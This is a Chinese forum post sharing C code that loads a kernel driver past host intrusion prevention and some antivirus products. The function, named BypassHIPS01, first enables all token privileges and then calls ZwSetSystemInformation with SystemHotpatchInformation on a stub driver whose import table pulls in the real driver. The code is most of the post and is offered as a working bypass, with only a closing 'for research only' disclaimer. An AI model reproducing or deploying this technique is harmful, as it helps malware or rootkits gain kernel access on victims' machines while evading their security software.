其实没啥可讲,也没啥可说的,这代码同样的是很老的代码,只是一直没放的原因是为了保持互联网和谐,但是都快圣诞,还是放一下吧~
首先这是一个基于ZwSetSystemInformation 加载驱动的方法,
其次这是一个只被部分杀毒拦截的方法别指望这个能过360,因为mj早知道这个~
然后说一下为啥是取巧,因为这是利用MmLoadSystemImage对驱动文件处理时,会自动加载并执行文件的导入表的其他驱动,于是你懂得。(具体参考 我那篇ZwLoadDriver的文章:http://bbs.pediy.com/showthread.php?t=142021)

最后上代码

代码:
//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)
{
        BOOL bResult = FALSE;
        HANDLE hToken;
        TOKEN_PRIVILEGES TokenPrivileges;

        if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
        {
                return FALSE;
        }

        TokenPrivileges.PrivilegeCount = 1;
        TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
        bResult = LookupPrivilegeValue(NULL,Name,&TokenPrivileges.Privileges[0].Luid);
        if(!bResult)
        {
                CloseHandle(hToken);
                return FALSE;
        }

        bResult = AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
        if(GetLastError() != ERROR_SUCCESS || !bResult)
        {
                CloseHandle(hToken);
                return FALSE;
        }

        CloseHandle(hToken);
        return TRUE;
}

//Jan 4 2005
//Enable all privilege, return num of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable)
{
        DWORD count=0; 
        ///
        count+=EnableSpecificPrivilege(bEnable,SE_ASSIGNPRIMARYTOKEN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_AUDIT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_BACKUP_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CHANGE_NOTIFY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PAGEFILE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PERMANENT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_CREATE_TOKEN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_DEBUG_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_INC_BASE_PRIORITY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_INCREASE_QUOTA_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_LOAD_DRIVER_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_LOCK_MEMORY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_PROF_SINGLE_PROCESS_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_REMOTE_SHUTDOWN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_RESTORE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SECURITY_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SHUTDOWN_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_ENVIRONMENT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_PROFILE_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_SYSTEMTIME_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_TAKE_OWNERSHIP_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_TCB_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_UNSOLICITED_INPUT_NAME);
        count+=EnableSpecificPrivilege(bEnable,SE_MACHINE_ACCOUNT_NAME);

        return count;
}
//Mar 7 2006
BOOL BypassHIPS01()
{
        
        struct {
                SYSTEM_HOTPATCH_CODE_INFORMATION shci;
                WCHAR KernelPath[MAX_PATH];
        } s;
        WCHAR FileName[MAX_PATH];
        WCHAR RealSysName[MAX_PATH];
        EnableAllPrivilege(TRUE);
        ZWSETSYSTEMINFORMATION pNtSetSystemInformation=(ZWSETSYSTEMINFORMATION)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "ZwSetSystemInformation");
        //LPTHREAD_START_ROUTINE pLdrHotPatchRoutine = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "LdrHotPatchRoutine");
        GetModuleFileNameW(NULL,FileName,MAX_PATH);
        (wcsrchr(FileName, L'\\'))[0] = L'\0';
        OutputDebugStringW(FileName);
        StringCbPrintfW(RealSysName,MAX_PATH,L"\\??\\%s\\HotpatchSys.sys",FileName);
        OutputDebugStringW(RealSysName);
        if(pNtSetSystemInformation)
        {
                s.shci.Flags = HOTP_USE_MODULE | HOTP_PATCH_APPLY|HOTP_KERNEL_MODULE;
                s.shci.InfoSize = sizeof(s);
                s.shci.KernelInfo.NameOffset=(WORD)((ULONG_PTR)s.KernelPath -(ULONG_PTR)&s.shci);
                s.shci.KernelInfo.NameLegth=2*wcslen(RealSysName);
                StringCbCopyW(s.KernelPath,MAX_PATH,RealSysName);
                OutputDebugStringW(s.KernelPath);
                //_tprintf(_T("Flags:%x,Size:%x,Offset:%x,NameLegth:%x\r\n"),s.shci.Flags,s.shci.InfoSize,s.shci.KernelInfo.NameOffset,s.shci.KernelInfo.NameLegth);
                //s.shci.UserModeInfo.NameOffset = (WORD)((ULONG_PTR)s.SourceName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.NameLegth = sizeof(SOURCE_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.TargetNameOffset = (WORD)((ULONG_PTR)s.TargetName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.TargetNameLegth = sizeof(TARGET_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.PatchingFinished = FALSE;
                //lstrcpynW(s.SourceName, SOURCE_NAME, sizeof(s.SourceName));
                //lstrcpynW(s.TargetName, TARGET_NAME, sizeof(s.TargetName));
               // hThread = CreateThread(NULL, 0, pLdrHotPatchRoutine, &s, 0, NULL);
               // WaitForSingleObject(hThread, INFINITE);
               // CloseHandle(hThread);
                NTSTATUS x = pNtSetSystemInformation(SystemHotpatchInformation,&s,sizeof(s));
                if (x==STATUS_INVALID_IMAGE_FORMAT)
                {
                        return TRUE;
                }
        }
        return FALSE;
}
加载的hotpatch.sys其实是一个空壳真正的驱动是由它的导入表导入的某个内核动态库驱动~
需要的hotpatch定义用的头文件在本帖的附件里给出~
HotPatch.rar

严重声明:本帖给出的代码仅供研究学习之用,如果用在他途,各种后果与本人无关。

欢迎交流,QQ群:171797360